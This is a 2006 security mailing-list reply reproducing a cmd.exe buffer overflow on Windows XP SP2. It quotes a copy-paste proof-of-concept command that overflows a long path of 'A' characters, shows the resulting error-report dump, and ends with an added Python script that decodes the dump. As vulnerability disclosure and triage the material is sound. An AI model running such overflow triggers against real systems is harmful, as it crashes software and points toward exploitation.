Vulnerability Development mailing list archives

Re: Windows Command Processor CMD.EXE Buffer Overflow


From: "Bernardo Wernesback" <bernardosw () gmail com>
Date: Mon, 23 Oct 2006 13:35:48 -0300

Reproduced the problem on Windows XP SP2 + All Patches English Version.

EventType : BEX     P1 : cmd.exe     P2 : 5.1.2600.2180     P3 : 41107ebe
P4 : unknown     P5 : 0.0.0.0     P6 : 00000000     P7 : 00410041
P8 : c0000005     P9 : 00000008

DEP went into action and generated a dump to be sent to Microsoft for cmd.exe.


On 10/19/06, gregory_panakkal  <gregory_panakkal () fastmail fm> wrote:

Windows Command Processor CMD.EXE Buffer Overflow
Tested on WinXP SP2
Impact - Very Low


Copy-paste the following line into cmd.exe and execute it.
(It is a single command that has been split into multiple lines for
readability's sake.)

%COMSPEC% /K "dir
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

DEP comes into the picture.

URL :
 http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html

regards,
Gregory Panakkal
www.infogreg.com
--
  gregory_panakkal
   gregory_panakkal () fastmail fm
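
The error report quoted in the reply can be read field by field. The following is an added example, not part of either message: it parses the P1..P9 values using the Windows Error Reporting BEX field order (application name, version, timestamp; fault module name, version, timestamp; exception offset, code, data) and decodes the ones that matter for triage. The function names are hypothetical.

```python
import re
import struct
from datetime import datetime, timezone

# WER "BEX" bucket fields P1..P9, in the order Windows Error Reporting emits them.
BEX_FIELDS = ["app_name", "app_version", "app_timestamp", "module_name",
              "module_version", "module_timestamp", "exception_offset",
              "exception_code", "exception_data"]

# Report text copied from the reply above.
REPORT = """EventType : BEX     P1 : cmd.exe     P2 : 5.1.2600.2180     P3 : 41107ebe
P4 : unknown     P5 : 0.0.0.0     P6 : 00000000     P7 : 00410041
P8 : c0000005     P9 : 00000008"""

def parse_bex(text):
    """Return the P1..P9 values of a BEX report as a dict keyed by field name."""
    params = dict(re.findall(r"\bP(\d)\s*:\s*(\S+)", text))
    return {name: params[str(i)] for i, name in enumerate(BEX_FIELDS, start=1)}

def printable_utf16(hex_dword):
    """Decode a 32-bit value as two little-endian UTF-16 units; None if not printable ASCII."""
    units = struct.unpack("<2H", struct.pack("<I", int(hex_dword, 16)))
    if all(0x20 <= u <= 0x7e for u in units):
        return "".join(chr(u) for u in units)
    return None

def triage(text):
    """Summarise the fields a responder checks first in a BEX report."""
    f = parse_bex(text)
    return {
        "app": f["app_name"],
        "build_time": datetime.fromtimestamp(int(f["app_timestamp"], 16), timezone.utc),
        # c0000005 = STATUS_ACCESS_VIOLATION; access type 8 = DEP (execute) violation
        "dep_violation": f["exception_code"].lower() == "c0000005"
                         and int(f["exception_data"], 16) == 8,
        # No owning module plus an address that decodes as text suggests the
        # instruction pointer was overwritten with input data.
        "fault_in_module": f["module_name"].lower() != "unknown",
        "offset_as_text": printable_utf16(f["exception_offset"]),
    }

if __name__ == "__main__":
    for key, value in triage(REPORT).items():
        print(f"{key}: {value}")
```

For this report the exception offset 00410041 decodes to two UTF-16 'A' characters, the same character used to fill the path in the original command.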




